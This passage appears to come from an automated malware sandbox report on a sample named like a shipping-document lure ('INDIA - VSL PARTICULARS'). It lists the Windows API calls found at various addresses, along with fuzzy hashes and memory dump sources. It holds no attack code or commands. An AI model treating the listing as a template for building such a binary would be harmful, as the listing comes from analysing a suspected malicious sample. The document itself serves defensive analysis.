                              • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                              Similarity
                              • API ID: MessageSend$LongWindow$InvalidateRect
                              • String ID:
                              • API String ID: 1976402638-0
                              • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                              • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                              • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                              APIs
                              • ShowWindow.USER32(?,00000000), ref: 00440A8A
                              • EnableWindow.USER32(?,00000000), ref: 00440AAF
                              • ShowWindow.USER32(?,00000000), ref: 00440B18
                              • ShowWindow.USER32(?,00000004), ref: 00440B2B
                              • EnableWindow.USER32(?,00000001), ref: 00440B50
                              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                              Similarity
                              • API ID: Window$Show$Enable$MessageSend
                              • String ID:
                              • API String ID: 642888154-0
                              • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                              • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                              • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                              Strings
                              Similarity
                              • API ID: Variant$Copy$ClearErrorLast
                              • String ID: NULL Pointer assignment$Not an Object type
                              • API String ID: 2487901850-572801152
                              • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                              • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                              • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                              APIs
                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                              • EnableWindow.USER32(?,00000000), ref: 00448B5C
                              • EnableWindow.USER32(?,00000001), ref: 00448B72
                              • ShowWindow.USER32(?,00000000), ref: 00448BE8
                              • ShowWindow.USER32(?,00000004), ref: 00448BF4
                              • EnableWindow.USER32(?,00000001), ref: 00448C09
                              Similarity
                              • API ID: Window$Enable$Show$MessageSend
                              • String ID:
                              • API String ID: 1871949834-0
                              • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                              • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                              • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                              • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                              • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                              APIs
                              • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                              • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                              • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                              • SendMessageW.USER32 ref: 00471AE3
                              • DestroyIcon.USER32(?), ref: 00471AF4
                              Similarity
                              • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                              • String ID:
                              • API String ID: 3611059338-0
                              • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                              • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                              • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                              APIs
                              Similarity
                              • API ID: DestroyWindow$DeleteObject$IconMove
                              • String ID:
                              • API String ID: 1640429340-0
                              • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                              • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                              • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • _wcslen.LIBCMT ref: 004438CD
                              • _wcslen.LIBCMT ref: 004438E6
                              • _wcstok.LIBCMT ref: 004438F8
                              • _wcslen.LIBCMT ref: 0044390C
                              • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                              • _wcstok.LIBCMT ref: 00443931
                              Similarity
                              • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                              • String ID:
                              • API String ID: 3632110297-0
                              • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                              • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                              • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteMenuObject$IconWindow
                              • String ID:
                              • API String ID: 752480666-0
                              • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                              • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                              • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                              • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                              • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                              • String ID:
                              • API String ID: 3275902921-0
                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                              APIs
                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: PerformanceQuery$CounterSleep$Frequency
                              • String ID:
                              • API String ID: 2833360925-0
                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                              APIs
                              • SendMessageW.USER32 ref: 004555C7
                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                              • DeleteObject.GDI32(?), ref: 00455736
                              • DeleteObject.GDI32(?), ref: 00455744
                              • DestroyIcon.USER32(?), ref: 00455752
                              • DestroyWindow.USER32(?), ref: 00455760
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                              • String ID:
                              • API String ID: 3691411573-0
                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                              APIs
                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                              • LineTo.GDI32(?,?,?), ref: 004472AC
                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                              • LineTo.GDI32(?,?,?), ref: 004472C6
                              • EndPath.GDI32(?), ref: 004472D6
                              • StrokePath.GDI32(?), ref: 004472E4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                              • String ID:
                              • API String ID: 372113273-0
                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                              APIs
                              • GetDC.USER32(00000000), ref: 0044CC6D
                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CapsDevice$Release
                              • String ID:
                              • API String ID: 1035833867-0
                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                              APIs
                              • __getptd.LIBCMT ref: 0041708E
                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                              • __amsg_exit.LIBCMT ref: 004170AE
                              • __lock.LIBCMT ref: 004170BE
                              • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                              • _free.LIBCMT ref: 004170EE
                              • InterlockedIncrement.KERNEL32(00A02DB0), ref: 00417106
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                              • String ID:
                              • API String ID: 3470314060-0
                              • Opcode ID: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction ID: d92c7102fc6d098775a0f5363b9b5483e5b10d08a1c29475ed017091780ded1e
                              • Opcode Fuzzy Hash: 80714434994c9102abdbbcfc383ede657addd51ae4f203e3d2298efcf25a3187
                              • Instruction Fuzzy Hash: 3301AD32905711ABC721ABA698497DE7BB0AB04724F15416BF950A7381CB3CAAC1CFDD
                              APIs
                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                              • String ID:
                              • API String ID: 3495660284-0
                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                              APIs
                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Virtual
                              • String ID:
                              • API String ID: 4278518827-0
                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                              APIs
                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                              • ExitThread.KERNEL32 ref: 004151ED
                              • __freefls@4.LIBCMT ref: 00415209
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                              • String ID:
                              • API String ID: 442100245-0
                              • Opcode ID: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction ID: 28e435cdead01fd65333368df2891c86ea6a44e569ea48f613a140ff37384f5b
                              • Opcode Fuzzy Hash: 3ee415d2c127bcf6c5e710345aa78d19554ad97a0662bc484850007a9fc41a8b
                              • Instruction Fuzzy Hash: FEF01975544700AFC704BF76C54D9CE7BB99F94349720845EB80887222DA3CD8C2C669
                              APIs
                                • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                              • GetMenuItemInfoW.USER32(?,00000000), ref: 0045F85C
                              • _wcslen.LIBCMT ref: 0045F94A
                              • SetMenuItemInfoW.USER32(00000011,00000000,00000000,?), ref: 0045F9AE
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • SetMenuDefaultItem.USER32(00000000,000000FF,00000000,?,00000000), ref: 0045F9CA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2190347807.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2190325185.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190405144.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190459368.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190509021.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190533171.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2190594120.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_INDIA - VSL PARTICULARS.jbxd
                              Similarity
                              • API ID: ItemMenu$Info_wcslen$Default_malloc_wcscpy
                              • String ID: 0
                              • API String ID: 621800784-4108050209
                              APIs
                                • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                              • SetErrorMode.KERNEL32 ref: 004781CE
                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
